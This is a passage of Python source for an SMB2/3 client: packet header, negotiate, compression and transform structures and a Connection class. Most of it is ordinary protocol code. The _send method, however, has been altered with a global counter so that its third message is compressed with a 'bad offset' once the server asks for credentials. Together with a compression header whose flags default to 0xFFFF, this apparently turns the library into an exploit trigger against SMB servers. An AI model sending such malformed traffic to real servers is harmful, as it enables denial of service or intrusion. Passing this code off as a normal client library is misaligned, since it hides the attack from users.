('protocol_id', BytesField(
size=4,
default=b"\xfeSMB",
)),
('structure_size', IntField(
size=2,
default=64,
)),
('credit_charge', IntField(size=2)),
('channel_sequence', IntField(size=2)),
('reserved', IntField(size=2)),
('command', EnumField(
size=2,
enum_type=Commands
)),
('credit_request', IntField(size=2)),
('flags', FlagField(
size=4,
flag_type=Smb2Flags,
)),
('next_command', IntField(size=4)),
('message_id', IntField(size=8)),
('process_id', IntField(size=4)),
('tree_id', IntField(size=4)),
('session_id', IntField(size=8)),
('signature', BytesField(
size=16,
default=b"\x00" * 16,
)),
('data', BytesField())
])
super(SMB2HeaderRequest, self).__init__()
class SMB2HeaderResponse(Structure):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.1.2 SMB2 Packet Header - SYNC
The header definition for an SMB Response that contains the Status field
instead of the ChannelSequence/Reserved used for a Packet response.
"""
def __init__(self):
self.fields = OrderedDict([
('protocol_id', BytesField(
size=4,
default=b'\xfeSMB',
)),
('structure_size', IntField(
size=2,
default=64,
)),
('credit_charge', IntField(size=2)),
('status', EnumField(
size=4,
enum_type=NtStatus,
enum_strict=False
)),
('command', EnumField(
size=2,
enum_type=Commands,
enum_strict=False,
)),
('credit_response', IntField(size=2)),
('flags', FlagField(
size=4,
flag_type=Smb2Flags,
)),
('next_command', IntField(size=4)),
('message_id', IntField(size=8)),
('reserved', IntField(size=4)),
('tree_id', IntField(size=4)),
('session_id', IntField(size=8)),
('signature', BytesField(
size=16,
default=b"\x00" * 16,
)),
('data', BytesField()),
])
super(SMB2HeaderResponse, self).__init__()
class SMB2NegotiateRequest(Structure):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3 SMB2 Negotiate Request
The SMB2 NEGOTIATE Request packet is used by the client to notify the
server what dialects of the SMB2 Protocol the client understands. This is
only used if the client explicitly sets the Dialect to use to a version
less than 3.1.1. Dialect 3.1.1 added support for negotiate_context and
SMB3NegotiateRequest should be used to support that.
"""
COMMAND = Commands.SMB2_NEGOTIATE
def __init__(self):
self.fields = OrderedDict([
('structure_size', IntField(
size=2,
default=36,
)),
('dialect_count', IntField(
size=2,
default=lambda s: len(s['dialects'].get_value()),
)),
('security_mode', FlagField(
size=2,
flag_type=SecurityMode
)),
('reserved', IntField(size=2)),
('capabilities', FlagField(
size=4,
flag_type=Capabilities,
)),
('client_guid', UuidField()),
('client_start_time', IntField(size=8)),
('dialects', ListField(
size=lambda s: s['dialect_count'].get_value() * 2,
list_count=lambda s: s['dialect_count'].get_value(),
list_type=EnumField(size=2, enum_type=Dialects),
)),
])
super(SMB2NegotiateRequest, self).__init__()
class SMB3NegotiateRequest(Structure):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3 SMB2 Negotiate Request
Like SMB2NegotiateRequest but with support for setting a list of
Negotiate Context values. This is used by default and is for Dialects 3.1.1
or greater.
"""
COMMAND = Commands.SMB2_NEGOTIATE
def __init__(self):
self.fields = OrderedDict([
('structure_size', IntField(
size=2,
default=36,
)),
('dialect_count', IntField(
size=2,
default=lambda s: len(s['dialects'].get_value()),
)),
('security_mode', FlagField(
size=2,
flag_type=SecurityMode,
)),
('reserved', IntField(size=2)),
('capabilities', FlagField(
size=4,
flag_type=Capabilities,
)),
('client_guid', UuidField()),
('negotiate_context_offset', IntField(
size=4,
default=lambda s: self._negotiate_context_offset_value(s),
)),
('negotiate_context_count', IntField(
size=2,
default=lambda s: len(s['negotiate_context_list'].get_value()),
)),
('reserved2', IntField(size=2)),
('dialects', ListField(
size=lambda s: s['dialect_count'].get_value() * 2,
list_count=lambda s: s['dialect_count'].get_value(),
list_type=EnumField(size=2, enum_type=Dialects),
)),
('padding', BytesField(
size=lambda s: self._padding_size(s),
default=lambda s: b"\x00" * self._padding_size(s),
)),
('negotiate_context_list', ListField(
list_count=lambda s: s['negotiate_context_count'].get_value(),
unpack_func=lambda s, d: self._negotiate_context_list(s, d),
)),
])
super(SMB3NegotiateRequest, self).__init__()
def _negotiate_context_offset_value(self, structure):
# The offset from the beginning of the SMB2 header to the first, 8-byte
# aligned, negotiate context
header_size = 64
negotiate_size = structure['structure_size'].get_value()
dialect_size = len(structure['dialects'])
padding_size = self._padding_size(structure)
return header_size + negotiate_size + dialect_size + padding_size
def _padding_size(self, structure):
# Padding between the end of the buffer value and the first Negotiate
# context value so that the first value is 8-byte aligned. Padding is
# 4 is there are no dialects specified
mod = (structure['dialect_count'].get_value() * 2) % 8
return 0 if mod == 0 else mod
def _negotiate_context_list(self, structure, data):
context_count = structure['negotiate_context_count'].get_value()
context_list = []
for idx in range(0, context_count):
field, data = self._parse_negotiate_context_entry(data, idx)
context_list.append(field)
return context_list
def _parse_negotiate_context_entry(self, data, idx):
data_length = struct.unpack("<H", data[2:4])[0]
negotiate_context = SMB2NegotiateContextRequest()
negotiate_context.unpack(data[:data_length + 8])
return negotiate_context, data[8 + data_length:]
class SMB2NegotiateContextRequest(Structure):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3.1 SMB2 NEGOTIATE_CONTEXT Request Values
The SMB2_NEGOTIATE_CONTEXT structure is used by the SMB2 NEGOTIATE Request
and the SMB2 NEGOTIATE Response to encode additional properties.
"""
COMMAND = Commands.SMB2_NEGOTIATE
def __init__(self):
self.fields = OrderedDict([
('context_type', EnumField(
size=2,
enum_type=NegotiateContextType,
)),
('data_length', IntField(
size=2,
default=lambda s: len(s['data'].get_value()),
)),
('reserved', IntField(size=4)),
('data', StructureField(
size=lambda s: s['data_length'].get_value(),
structure_type=lambda s: self._data_structure_type(s)
)),
# not actually a field but each list entry must start at the 8 byte
# alignment
('padding', BytesField(
size=lambda s: self._padding_size(s),
default=lambda s: b"\x00" * self._padding_size(s),
))
])
super(SMB2NegotiateContextRequest, self).__init__()
def _data_structure_type(self, structure):
con_type = structure['context_type'].get_value()
if con_type == \
NegotiateContextType.SMB2_PREAUTH_INTEGRITY_CAPABILITIES:
return SMB2PreauthIntegrityCapabilities
elif con_type == NegotiateContextType.SMB2_ENCRYPTION_CAPABILITIES:
return SMB2EncryptionCapabilities
elif con_type == NegotiateContextType.SMB2_COMPRESSION_CAPABILITIES:
return SMB2CompressionCapabilities
def _padding_size(self, structure):
data_size = len(structure['data'])
return 8 - data_size if data_size <= 8 else 8 - (data_size % 8)
class SMB2PreauthIntegrityCapabilities(Structure):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3.1.1 SMB2_PREAUTH_INTEGRITY_CAPABILITIES
The SMB2_PREAUTH_INTEGRITY_CAPABILITIES context is specified in an SMB2
NEGOTIATE request by the client to indicate which preauthentication
integrity hash algorithms it supports and to optionally supply a
preauthentication integrity hash salt value.
"""
def __init__(self):
self.fields = OrderedDict([
('hash_algorithm_count', IntField(
size=2,
default=lambda s: len(s['hash_algorithms'].get_value()),
)),
('salt_length', IntField(
size=2,
default=lambda s: len(s['salt']),
)),
('hash_algorithms', ListField(
size=lambda s: s['hash_algorithm_count'].get_value() * 2,
list_count=lambda s: s['hash_algorithm_count'].get_value(),
list_type=EnumField(size=2, enum_type=HashAlgorithms),
)),
('salt', BytesField(
size=lambda s: s['salt_length'].get_value(),
)),
])
super(SMB2PreauthIntegrityCapabilities, self).__init__()
class SMB2EncryptionCapabilities(Structure):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.3.1.2 SMB2_ENCRYPTION_CAPABILITIES
The SMB2_ENCRYPTION_CAPABILITIES context is specified in an SMB2 NEGOTIATE
request by the client to indicate which encryption algorithms the client
supports.
"""
def __init__(self):
self.fields = OrderedDict([
('cipher_count', IntField(
size=2,
default=lambda s: len(s['ciphers'].get_value()),
)),
('ciphers', ListField(
size=lambda s: s['cipher_count'].get_value() * 2,
list_count=lambda s: s['cipher_count'].get_value(),
list_type=EnumField(size=2, enum_type=Ciphers),
)),
])
super(SMB2EncryptionCapabilities, self).__init__()
class SMB2CompressionCapabilities(Structure):
"""
[MS-SMB2]
2.2.3.1.3 SMB2_COMPRESSION_CAPABILITIES
"""
def __init__(self):
self.fields = OrderedDict([
('compression_algorithm_count', IntField(
size=2,
default=lambda s: len(s['compression_algorithms'].get_value()),
)),
('fpadding', IntField(
size=2,
default=0,
)),
('flags', BytesField(
size=4,
default=b"\x01\x00\x00\x01",
)),
('compression_algorithms', ListField(
size=lambda s: s['compression_algorithm_count'].get_value() * 2,
list_count=lambda s: s['compression_algorithm_count'].get_value(),
list_type=EnumField(size=2, enum_type=CompressionAlgos),
)),
])
super(SMB2CompressionCapabilities, self).__init__()
class SMB2NegotiateResponse(Structure):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.4 SMB2 NEGOTIATE Response
The SMB2 NEGOTIATE Response packet is sent by the server to notify the
client of the preferred common dialect.
"""
COMMAND = Commands.SMB2_NEGOTIATE
def __init__(self):
self.fields = OrderedDict([
('structure_size', IntField(
size=2,
default=65,
)),
('security_mode', FlagField(
size=2,
flag_type=SecurityMode,
)),
('dialect_revision', EnumField(
size=2,
enum_type=Dialects,
)),
('negotiate_context_count', IntField(
size=2,
default=lambda s: self._negotiate_context_count_value(s),
)),
('server_guid', UuidField()),
('capabilities', FlagField(
size=4,
flag_type=Capabilities
)),
('max_transact_size', IntField(size=4)),
('max_read_size', IntField(size=4)),
('max_write_size', IntField(size=4)),
('system_time', DateTimeField()),
('server_start_time', DateTimeField()),
('security_buffer_offset', IntField(
size=2,
default=128, # (header size 64) + (structure size 64)
)),
('security_buffer_length', IntField(
size=2,
default=lambda s: len(s['buffer'].get_value()),
)),
('negotiate_context_offset', IntField(
size=4,
default=lambda s: self._negotiate_context_offset_value(s),
)),
('buffer', BytesField(
size=lambda s: s['security_buffer_length'].get_value(),
)),
('padding', BytesField(
size=lambda s: self._padding_size(s),
default=lambda s: b"\x00" * self._padding_size(s),
)),
('negotiate_context_list', ListField(
list_count=lambda s: s['negotiate_context_count'].get_value(),
unpack_func=lambda s, d:
self._negotiate_context_list(s, d),
)),
])
super(SMB2NegotiateResponse, self).__init__()
def _negotiate_context_count_value(self, structure):
# If the dialect_revision is SMBv3.1.1, this field specifies the
# number of negotiate contexts in negotiate_context_list; otherwise
# this field must not be used and must be reserved (0).
if structure['dialect_revision'].get_value() == Dialects.SMB_3_1_1:
return len(structure['negotiate_context_list'].get_value())
else:
return None
def _negotiate_context_offset_value(self, structure):
# If the dialect_revision is SMBv3.1.1, this field specifies the offset
# from the beginning of the SMB2 header to the first 8-byte
# aligned negotiate context entry in negotiate_context_list; otherwise
# this field must not be used and must be reserved (0).
if structure['dialect_revision'].get_value() == Dialects.SMB_3_1_1:
buffer_offset = structure['security_buffer_offset'].get_value()
buffer_size = structure['security_buffer_length'].get_value()
padding_size = self._padding_size(structure)
return buffer_offset + buffer_size + padding_size
else:
return None
def _padding_size(self, structure):
# Padding between the end of the buffer value and the first Negotiate
# context value so that the first value is 8-byte aligned. Padding is
# not required if there are not negotiate contexts
if structure['negotiate_context_count'].get_value() == 0:
return 0
mod = structure['security_buffer_length'].get_value() % 8
return 0 if mod == 0 else 8 - mod
def _negotiate_context_list(self, structure, data):
context_count = structure['negotiate_context_count'].get_value()
context_list = []
for idx in range(0, context_count):
field, data = self._parse_negotiate_context_entry(data)
context_list.append(field)
return context_list
def _parse_negotiate_context_entry(self, data):
data_length = struct.unpack("<H", data[2:4])[0]
negotiate_context = SMB2NegotiateContextRequest()
negotiate_context.unpack(data[:data_length + 8])
padded_size = data_length % 8
if padded_size != 0:
padded_size = 8 - padded_size
return negotiate_context, data[8 + data_length + padded_size:]
class SMB2Echo(Structure):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.28 SMB2 Echo Request/Response
Request and response for an SMB ECHO message.
"""
COMMAND = Commands.SMB2_ECHO
def __init__(self):
self.fields = OrderedDict([
('structure_size', IntField(
size=2,
default=4
)),
('reserved', IntField(size=2))
])
super(SMB2Echo, self).__init__()
class SMB2CancelRequest(Structure):
"""
[MS-SMB2] 2.2.30 - SMB2 CANCEL Request
https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/91913fc6-4ec9-4a83-961b-370070067e63
The SMB2 CANCEL Request packet is sent by the client to cancel a previously sent message on the same SMB2 transport
connection.
"""
COMMAND = Commands.SMB2_CANCEL
def __init__(self):
self.fields = OrderedDict([
('structure_size', IntField(
size=2,
default=4,
)),
('reserved', IntField(size=2)),
])
super(SMB2CancelRequest, self).__init__()
class SMB2TransformHeader(Structure):
"""
[MS-SMB2] v53.0 2017-09-15
2.2.41 SMB2 TRANSFORM_HEADER
The SMB2 Transform Header is used by the client or server when sending
encrypted message. This is only valid for the SMB.x dialect family.
"""
def __init__(self):
self.fields = OrderedDict([
('protocol_id', BytesField(
size=4,
default=b"\xfdSMB"
)),
('signature', BytesField(
size=16,
default=b"\x00" * 16
)),
('nonce', BytesField(size=16)),
('original_message_size', IntField(size=4)),
('reserved', IntField(size=2, default=0)),
('flags', IntField(
size=2,
default=1
)),
('session_id', IntField(size=8)),
('data', BytesField()) # not in spec
])
super(SMB2TransformHeader, self).__init__()
class SMB2CompressionTransformHeader(Structure):
def __init__(self):
self.fields = OrderedDict([
('protocol_id', BytesField(
size=4,
default=b"\xfcSMB"
)),
('original_size', IntField(
size=4,
default=0
)),
('compression_algorithm', EnumField(
size=2, enum_type=CompressionAlgos, default=CompressionAlgos.LZNT1
)),
('flags', BytesField(
size=2,
default=b"\xff\xff"
)),
('offset', IntField(size=4, default=0)),
('data', BytesField()) # not in spec
])
super(SMB2CompressionTransformHeader, self).__init__()
def _worker_running(func):
""" Ensures the message worker thread is still running and hasn't failed for any reason. """
def wrapped(self, *args, **kwargs):
self._check_worker_running()
return func(self, *args, **kwargs)
return wrapped
class Connection(object):
def __init__(self, guid, server_name, port=445, require_signing=True):
"""
[MS-SMB2] v53.0 2017-09-15
3.2.1.2 Per SMB2 Transport Connection
Used as the transport interface for a server. Some values have been
omitted as they can be retrieved by the Server object stored in
self.server
:param guid: A unique guid that represents the client
:param server_name: The server to start the connection
:param port: The port to use for the transport, default is 445
:param require_signing: Whether signing is required on SMB messages
sent over this connection
"""
log.info("Initialising connection, guid: %s, require_singing: %s, "
"server_name: %s, port: %d"
% (guid, require_signing, server_name, port))
self.server_name = server_name
self.port = port
self.transport = None # Instanciated in .connect()
# Table of Session entries, the order is important for smbclient.
self.session_table = OrderedDict()
# Table of sessions that have not completed authentication, indexed by
# session_id
self.preauth_session_table = {}
# Table of Requests that have yet to be picked up by the application,
# it MAY contain a response from the server as well
self.outstanding_requests = dict()
# Table of available sequence numbers
self.sequence_window = dict(
low=0,
high=1
)
self.sequence_lock = Lock()
# Byte array containing the negotiate token and remembered for
# authentication
self.gss_negotiate_token = None
self.server_guid = None
self.max_transact_size = None
self.max_read_size = None
self.max_write_size = None
self.require_signing = require_signing
# SMB 2.1+
self.dialect = None
self.supports_file_leasing = None
# just go with False as a default for Dialect 2.0.2
self.supports_multi_credit = False
self.client_guid = guid
# SMB 3.x+
self.salt = None
self.supports_directory_leasing = None
self.supports_multi_channel = None
self.supports_persistent_handles = None
self.supports_encryption = None
self.support_compression = None
# used for SMB 3.x for secure negotiate verification on tree connect
self.negotiated_dialects = []
self.client_capabilities = Capabilities.SMB2_GLOBAL_CAP_LARGE_MTU | \
Capabilities.SMB2_GLOBAL_CAP_ENCRYPTION
self.client_security_mode = \
SecurityMode.SMB2_NEGOTIATE_SIGNING_REQUIRED if \
require_signing else SecurityMode.SMB2_NEGOTIATE_SIGNING_ENABLED
self.server_security_mode = None
self.server_capabilities = None
# SMB 3.1.1+
# The hashing algorithm object that was negotiated
self.preauth_integrity_hash_id = None
# Preauth integrity hash value computed for the SMB2 NEGOTIATE request
# contains the messages used to compute the hash
self.preauth_integrity_hash_value = []
# The cipher object that was negotiated
self.cipher_id = None
# Keep track of the message processing thread's potential traceback that it may raise.
self._t_exc = None
def connect(self, dialect=None, timeout=60):
"""
Will connect to the target server and negotiate the capabilities
with the client. Once setup, the client MUST call the disconnect()
function to close the listener thread. This function will populate
various connection properties that denote the capabilities of the
server.
:param dialect: If specified, forces the dialect that is negotiated
with the server, if not set, then the newest dialect supported by
the server is used up to SMB 3.1.1
:param timeout: The timeout in seconds to wait for the initial
negotiation process to complete
"""
log.info("Setting up transport connection")
message_queue = Queue()
self.transport = Tcp(self.server_name, self.port, message_queue, timeout)
t_worker = threading.Thread(target=self._process_message_thread, args=(message_queue,),
name="msg_worker-%s:%s" % (self.server_name, self.port))
t_worker.daemon = True
t_worker.start()
log.info("Starting negotiation with SMB server")
smb_response = self._send_smb2_negotiate(dialect, timeout)
log.info("Negotiated dialect: %s"
% str(smb_response['dialect_revision']))
self.dialect = smb_response['dialect_revision'].get_value()
self.max_transact_size = smb_response['max_transact_size'].get_value()
self.max_read_size = smb_response['max_read_size'].get_value()
self.max_write_size = smb_response['max_write_size'].get_value()
self.server_guid = smb_response['server_guid'].get_value()
self.gss_negotiate_token = smb_response['buffer'].get_value()
if not self.require_signing and \
smb_response['security_mode'].has_flag(
SecurityMode.SMB2_NEGOTIATE_SIGNING_REQUIRED):
self.require_signing = True
log.info("Connection require signing: %s" % self.require_signing)
capabilities = smb_response['capabilities']
# SMB 2.1
if self.dialect >= Dialects.SMB_2_1_0:
self.supports_file_leasing = \
capabilities.has_flag(Capabilities.SMB2_GLOBAL_CAP_LEASING)
self.supports_multi_credit = \
capabilities.has_flag(Capabilities.SMB2_GLOBAL_CAP_LARGE_MTU)
# SMB 3.x
if self.dialect >= Dialects.SMB_3_0_0:
self.supports_directory_leasing = capabilities.has_flag(
Capabilities.SMB2_GLOBAL_CAP_DIRECTORY_LEASING)
self.supports_multi_channel = capabilities.has_flag(
Capabilities.SMB2_GLOBAL_CAP_MULTI_CHANNEL)
# TODO: SMB2_GLOBAL_CAP_PERSISTENT_HANDLES
self.supports_persistent_handles = False
self.supports_encryption = capabilities.has_flag(
Capabilities.SMB2_GLOBAL_CAP_ENCRYPTION) \
and self.dialect < Dialects.SMB_3_1_1
self.server_capabilities = capabilities
self.server_security_mode = \
smb_response['security_mode'].get_value()
# TODO: Check/add server to server_list in Client Page 203
# SMB 3.1
if self.dialect >= Dialects.SMB_3_1_1:
for context in smb_response['negotiate_context_list']:
if context['context_type'].get_value() == \
NegotiateContextType.SMB2_ENCRYPTION_CAPABILITIES:
cipher_id = context['data']['ciphers'][0]
self.cipher_id = Ciphers.get_cipher(cipher_id)
self.supports_encryption = self.cipher_id != 0
elif context['context_type'].get_value() == \
NegotiateContextType.SMB2_PREAUTH_INTEGRITY_CAPABILITIES:
hash_id = context['data']['hash_algorithms'][0]
self.preauth_integrity_hash_id = \
HashAlgorithms.get_algorithm(hash_id)
def disconnect(self, close=True):
"""
Closes the connection as well as logs off any of the
Disconnects the TCP connection and shuts down the socket listener
running in a thread.
:param close: Will close all sessions in the connection as well as the
tree connections of each session.
"""
if close:
for session in list(self.session_table.values()):
session.disconnect(True)
log.info("Disconnecting transport connection")
self.transport.close()
def send(self, message, sid=None, tid=None, credit_request=None, message_id=None, async_id=None):
"""
Will send a message to the server that is passed in. The final unencrypted header is returned to the function
that called this.
:param message: An SMB message structure to send.
:param sid: A session_id that the message is sent for.
:param tid: A tree_id object that the message is sent for.
:param credit_request: Specifies extra credits to be requested with the SMB header.
:param message_id: The message_id for the header, only useful for a cancel request.
:param async_id: The async_id for the header, only useful for a cancel request.
:return: Request of the message that was sent.
"""
return self._send([message], session_id=sid, tree_id=tid, message_id=message_id, credit_request=credit_request,
async_id=async_id)[0]
def send_compound(self, messages, sid, tid, related=False):
"""
Sends multiple messages within 1 TCP request, will fail if the size of the total length exceeds the maximum of
the transport max.
:param messages: A list of messages to send to the server.
:param sid: The session_id that the request is sent for.
:param tid: A tree_id object that the message is sent for.
:param related: Whether each message is related to each other, sets the Session, Tree, and File Id to the same
value as the first message.
:return: List<Request> for each request that was sent, each entry in the list is in the same order of the
message list that was passed in.
"""
return self._send(messages, session_id=sid, tree_id=tid, related=related)
@_worker_running
def receive(self, request, wait=True, timeout=None, resolve_symlinks=True):
"""
Polls the message buffer of the TCP connection and waits until a valid
message is received based on the message_id passed in.
:param request: The Request object to wait get the response for
:param wait: Wait for the final response in the case of a STATUS_PENDING response, the pending response is
returned in the case of wait=False
:param timeout: Set a timeout used while waiting for the final response from the server.
:param resolve_symlinks: Set to automatically resolve symlinks in the path when opening a file or directory.
:return: SMB2HeaderResponse of the received message
"""
start_time = time.time()
while True:
iter_timeout = int(max(timeout - (time.time() - start_time), 1)) if timeout is not None else None
if not request.response_event.wait(timeout=iter_timeout):
raise SMBException("Connection timeout of %d seconds exceeded while waiting for a message id %s "
"response from the server" % (timeout, request.message['message_id'].get_value()))
# Use a lock on the request so that in the case of a pending response we have exclusive lock on the event
# flag and can clear it without the future pending response taking it over before we first clear the flag.
with request.response_event_lock:
self._check_worker_running() # The worker may have failed while waiting for the response, check again
response = request.response
status = response['status'].get_value()
if status == NtStatus.STATUS_PENDING and wait:
# Received a pending message, clear the response_event flag and wait again.
request.response_event.clear()
continue
elif status == NtStatus.STATUS_STOPPED_ON_SYMLINK and resolve_symlinks:
# Received when we do an Open on a path that contains a symlink. Need to capture all related
# requests and resend the Open + others with the redirected path. First we need to resolve the
# symlink path. This will fail if the symlink is pointing to a location that is not in the same
# tree/share as the original request.
# First wait for the other remaining requests to be processed. Their status will also fail and we
# need to make sure we update the old request with the new one properly.
related_requests = [self.outstanding_requests[i] for i in request.related_ids]
[r.response_event.wait() for r in related_requests]
# Now create a new request with the new path the symlink points to.
session = self.session_table[request.session_id]
tree = session.tree_connect_table[request.message['tree_id'].get_value()]
old_create = request.get_message_data()
tree_share_name = tree.share_name + u'\\'
original_path = tree_share_name + to_text(old_create['buffer_path'].get_value(),
encoding='utf-16-le')
exp = SMBResponseException(response, status)
reparse_buffer = next((e for e in exp.error_details
if isinstance(e, SMB2SymbolicLinkErrorResponse)))
new_path = reparse_buffer.resolve_path(original_path)[len(tree_share_name):]
new_open = Open(tree, new_path)
create_req = new_open.create(
old_create['impersonation_level'].get_value(),
old_create['desired_access'].get_value(),
old_create['file_attributes'].get_value(),
old_create['share_access'].get_value(),
old_create['create_disposition'].get_value(),
old_create['create_options'].get_value(),
create_contexts=old_create['buffer_contexts'].get_value(),
send=False
)[0]
# Now add all the related requests (if any) to send as a compound request.
new_msgs = [create_req] + [r.get_message_data() for r in related_requests]
new_requests = self.send_compound(new_msgs, session.session_id, tree.tree_connect_id, related=True)
# Verify that the first request was successful before updating the related requests with the new
# info.
error = None
try:
new_response = self.receive(new_requests[0], wait=wait, timeout=timeout, resolve_symlinks=True)
except SMBResponseException as exc:
# We need to make sure we fix up the remaining responses before throwing this.
error = exc
[r.response_event.wait() for r in new_requests]
# Update the old requests with the new response information
for i, old_request in enumerate([request] + related_requests):
del self.outstanding_requests[old_request.message['message_id'].get_value()]
old_request.update_request(new_requests[i])
if error:
raise error
return new_response
elif status not in [NtStatus.STATUS_SUCCESS, NtStatus.STATUS_PENDING]:
raise SMBResponseException(response, status)
else:
break
# now we have a retrieval request for the response, we can delete
# the request from the outstanding requests
message_id = request.message['message_id'].get_value()
del self.outstanding_requests[message_id]
return response
def echo(self, sid=0, timeout=60, credit_request=1):
"""
Sends an SMB2 Echo request to the server. This can be used to request
more credits from the server with the credit_request param.
On a Samba server, the sid can be 0 but for a Windows SMB Server, the
sid of an authenticated session must be passed into this function or
else the socket will close.
:param sid: When talking to a Windows host this must be populated with
a valid session_id from a negotiated session
:param timeout: The timeout in seconds to wait for the Echo Response
:param credit_request: The number of credits to request
:return: the credits that were granted by the server
"""
log.info("Sending Echo request with a timeout of %d and credit "
"request of %d" % (timeout, credit_request))
echo_msg = SMB2Echo()
log.debug(echo_msg)
req = self.send(echo_msg, sid=sid, credit_request=credit_request)
log.info("Receiving Echo response")
response = self.receive(req, timeout=timeout)
log.info("Credits granted from the server echo response: %d"
% response['credit_response'].get_value())
echo_resp = SMB2Echo()
echo_resp.unpack(response['data'].get_value())
log.debug(echo_resp)
return response['credit_response'].get_value()
def verify_signature(self, header, session_id, force=False):
"""
Verifies the SMB2 Header request/response signature.
:param header: The SMB2Header that will have its signature verified against the signing key specified.
:param session_id: The Session Id to denote what session security verifies the message.
:param force: Force verification of the header even if it does not match the criteria required in normal
scenarios.
"""
message_id = header['message_id'].get_value()
flags = header['flags']
status = header['status'].get_value()
command = header['command'].get_value()
if not force and (message_id == 0xFFFFFFFFFFFFFFFF or
not flags.has_flag(Smb2Flags.SMB2_FLAGS_SIGNED) or
status == NtStatus.STATUS_PENDING or
command == Commands.SMB2_SESSION_SETUP):
return
session = self.session_table.get(session_id, None)
if session is None:
raise SMBException("Failed to find session %s for message verification" % session_id)
expected = self._generate_signature(header.pack(), session.signing_key)
actual = header['signature'].get_value()
if actual != expected:
raise SMBException("Server message signature could not be verified: %s != %s"
% (to_native(binascii.hexlify(actual)), to_native(binascii.hexlify(expected))))
def _check_worker_running(self):
""" Checks that the message worker thread is still running and raises it's exception if it has failed. """
if self._t_exc is not None:
self.disconnect(False)
raise self._t_exc
@_worker_running
def _send(self, messages, session_id=None, tree_id=None, message_id=None, credit_request=None, related=False,
async_id=None):
send_data = b""
requests = []
session = self.session_table.get(session_id, None)
tree = None
if tree_id and session:
if tree_id not in session.tree_connect_table:
raise SMBException("Cannot find Tree with the ID %d in the session tree table" % tree_id)
tree = session.tree_connect_table[tree_id]
total_requests = len(messages)
for i, message in enumerate(messages):
if i == total_requests - 1:
next_command = 0
padding = b""
else:
# each compound message must start at the 8-byte boundary
msg_length = 64 + len(message)
mod = msg_length % 8
padding_length = 8 - mod if mod > 0 else 0
next_command = msg_length + padding_length
padding = b"\x00" * padding_length
# When running with multiple threads we need to ensure that getting the message id and adjusting the
# sequence windows is done in a thread safe manner so we use a lock to ensure only 1 thread accesses the
# sequence window at a time.
with self.sequence_lock:
sequence_window_low = self.sequence_window['low']
sequence_window_high = self.sequence_window['high']
credit_charge = self._calculate_credit_charge(message)
credits_available = sequence_window_high - sequence_window_low
if credit_charge > credits_available:
raise SMBException("Request requires %d credits but only %d credits are available"
% (credit_charge, credits_available))
current_id = message_id or sequence_window_low
if message.COMMAND != Commands.SMB2_CANCEL:
self.sequence_window['low'] += credit_charge if credit_charge > 0 else 1
if async_id is None:
header = SMB2HeaderRequest()
header['tree_id'] = tree_id or 0
else:
header = SMB2HeaderAsync()
header['flags'].set_flag(Smb2Flags.SMB2_FLAGS_ASYNC_COMMAND)
header['async_id'] = async_id
header['credit_charge'] = credit_charge
header['command'] = message.COMMAND
header['credit_request'] = credit_request if credit_request else credit_charge
header['message_id'] = current_id
header['session_id'] = session_id or 0
header['data'] = message.pack()
header['next_command'] = next_command
if i != 0 and related:
header['session_id'] = b"\xff" * 8
header['tree_id'] = b"\xff" * 4
header['flags'].set_flag(Smb2Flags.SMB2_FLAGS_RELATED_OPERATIONS)
if session and session.signing_required and session.signing_key:
header['flags'].set_flag(Smb2Flags.SMB2_FLAGS_SIGNED)
b_header = header.pack() + padding
signature = self._generate_signature(b_header, session.signing_key)
# To save on unpacking and re-packing, manually adjust the signature and update the request object for
# back-referencing.
b_header = b_header[:48] + signature + b_header[64:]
header['signature'] = signature
else:
b_header = header.pack() + padding
send_data += b_header
if message.COMMAND == Commands.SMB2_CANCEL:
request = self.outstanding_requests[header['message_id'].get_value()]
else:
request = Request(header, type(message), self, session_id=session_id)
self.outstanding_requests[header['message_id'].get_value()] = request
requests.append(request)
if related:
requests[0].related_ids = [r.message['message_id'].get_value() for r in requests][1:]
global g_count
g_count += 1
if g_count == 3: # send the bad offset after the server asks for creds
send_data = self._compress(send_data, session)
if session and session.encrypt_data or tree and tree.encrypt_data:
send_data = self._encrypt(send_data, session)
self.transport.send(send_data)
return requests
def _process_message_thread(self, msg_queue):
while True:
b_msg = msg_queue.get()
# The socket will put None in the queue if it is closed, signalling the end of the connection.
if b_msg is None:
return
try:
is_compressed = b_msg[:4] == b"\xfcSMB"
if is_compressed:
msg = SMB2CompressionTransformHeader()
msg.unpack(b_msg)
b_msg = self._decompress(msg)
is_encrypted = b_msg[:4] == b"\xfdSMB"
if is_encrypted:
msg = SMB2TransformHeader()
msg.unpack(b_msg)
b_msg = self._decrypt(msg)
next_command = -1
while next_command != 0:
next_command = struct.unpack("<L", b_msg[20:24])[0]
header_length = next_command if next_command != 0 else len(b_msg)
b_header = b_msg[:header_length]
b_msg = b_msg[header_length:]
header = SMB2HeaderResponse()
header.unpack(b_header)
message_id = header['message_id'].get_value()
request = self.outstanding_requests[message_id]
# Typically you want to get the Session Id from the first message in a compound request but that is
# unreliable for async responses. Instead get the Session Id from the original request object if
# the Session Id is 0xFFFFFFFFFFFFFFFF.
# https://social.msdn.microsoft.com/Forums/en-US/a580f7bc-6746-4876-83db-6ac209b202c4/mssmb2-change-notify-response-sessionid?forum=os_fileservices
session_id = header['session_id'].get_value()
if session_id == 0xFFFFFFFFFFFFFFFF:
session_id = request.session_id
# No need to waste CPU cycles to verify the signature if we already decrypted the header.
if not is_encrypted:
self.verify_signature(header, session_id)
credit_response = header['credit_response'].get_value()
with self.sequence_lock:
self.sequence_window['high'] += credit_response if credit_response > 0 else 1
with request.response_event_lock:
if header['flags'].has_flag(Smb2Flags.SMB2_FLAGS_ASYNC_COMMAND):
request.async_id = b_header[32:40]
request.response = header
request.response_event.set()
except Exception as exc:
# The exception is raised in _check_worker_running by the main thread when send/receive is called next.
self._t_exc = exc
# Make sure we fire all the request events to ensure the main thread isn't waiting on a receive.
for request in self.outstanding_requests.values():
request.response_event.set()
# While a caller of send/receive could theoretically catch this exception, we consider any failures
# here a fatal errors and the connection should be closed so we exit the worker thread.
self.disconnect(False)
return
def _generate_signature(self, b_header, signing_key):
b_header = b_header[:48] + (b"\x00" * 16) + b_header[64:]
